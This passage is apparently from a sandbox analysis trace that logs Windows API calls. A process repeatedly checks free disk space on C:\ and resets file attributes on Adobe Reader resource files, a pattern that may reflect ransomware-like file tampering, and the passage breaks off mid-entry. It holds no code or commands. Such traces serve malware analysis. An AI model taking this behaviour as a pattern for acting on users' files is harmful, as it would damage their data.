[0111.730] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.735] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt", dwFileAttributes=0x80) returned 1 [0111.738] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.743] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt", dwFileAttributes=0x80) returned 1 [0111.746] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.753] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt", dwFileAttributes=0x80) returned 1 [0111.757] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.762] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt", dwFileAttributes=0x80) returned 1 [0111.764] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.769] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt", dwFileAttributes=0x80) returned 1 [0111.773] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.778] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt", dwFileAttributes=0x80) returned 1 [0111.781] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.786] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt", dwFileAttributes=0x80) returned 1 [0111.789] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.795] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt", dwFileAttributes=0x80) returned 1 [0111.799] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.804] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt", dwFileAttributes=0x80) returned 1 [0111.807] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.813] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt", dwFileAttributes=0x80) returned 1 [0111.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.822] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt", dwFileAttributes=0x80) returned 1 [0111.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.830] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.833] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.838] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt", dwFileAttributes=0x80) returned 1 [0111.841] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.891] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.900] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt", dwFileAttributes=0x80) returned 1 [0111.902] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.908] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt", dwFileAttributes=0x80) returned 1 [0111.911] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.917] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt", dwFileAttributes=0x80) returned 1 [0111.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.926] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt", dwFileAttributes=0x80) returned 1 [0111.929] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.942] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt", dwFileAttributes=0x80) returned 1 [0111.945] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.952] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.955] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.962] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt", dwFileAttributes=0x80) returned 1 [0111.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.970] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt", dwFileAttributes=0x80) returned 1 [0111.973] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.979] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt", dwFileAttributes=0x80) returned 1 [0111.982] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.988] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt", dwFileAttributes=0x80) returned 1 [0111.991] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.996] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt", dwFileAttributes=0x80) returned 1 [0111.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.004] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt", dwFileAttributes=0x80) returned 1 [0112.007] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.012] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt", dwFileAttributes=0x80) returned 1 [0112.015] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.020] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt", dwFileAttributes=0x80) returned 1 [0112.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.028] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt", dwFileAttributes=0x80) returned 1 [0112.031] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.036] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt", dwFileAttributes=0x80) returned 1 [0112.039] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.045] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt", dwFileAttributes=0x80) returned 1 [0112.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.054] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt", dwFileAttributes=0x80) returned 1 [0112.057] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.063] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt", dwFileAttributes=0x80) returned 1 [0112.065] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.071] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt", dwFileAttributes=0x80) returned 1 [0112.074] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.081] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt", dwFileAttributes=0x80) returned 1 [0112.083] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.089] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt", dwFileAttributes=0x80) returned 1 [0112.091] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.096] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt", dwFileAttributes=0x80) returned 1 [0112.099] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.105] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt", dwFileAttributes=0x80) returned 1 [0112.108] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0112.113] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt", dwFileAttributes=0x80) returned 1 [0112.118] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.118] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.118] CoTaskMemFree (pv=0x508980) [0112.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.118] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.118] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.118] CoTaskMemFree (pv=0x508980) [0112.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.119] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.119] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.119] CoTaskMemFree (pv=0x508980) [0112.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.131] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.131] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.132] CoTaskMemFree (pv=0x508980) [0112.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.133] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.133] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.133] CoTaskMemFree (pv=0x508980) [0112.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.139] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.139] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.140] CoTaskMemFree (pv=0x508980) [0112.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.140] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.140] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.140] CoTaskMemFree (pv=0x508980) [0112.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.143] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.143] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.144] CoTaskMemFree (pv=0x508980) [0112.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.144] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.144] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.144] CoTaskMemFree (pv=0x508980) [0112.149] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.192] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt", dwFileAttributes=0x80) returned 1 [0112.197] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.217] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt", dwFileAttributes=0x80) returned 1 [0112.222] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.232] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt", dwFileAttributes=0x80) returned 1 [0112.235] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.249] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt", dwFileAttributes=0x80) returned 1 [0112.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.256] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt", dwFileAttributes=0x80) returned 1 [0112.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, 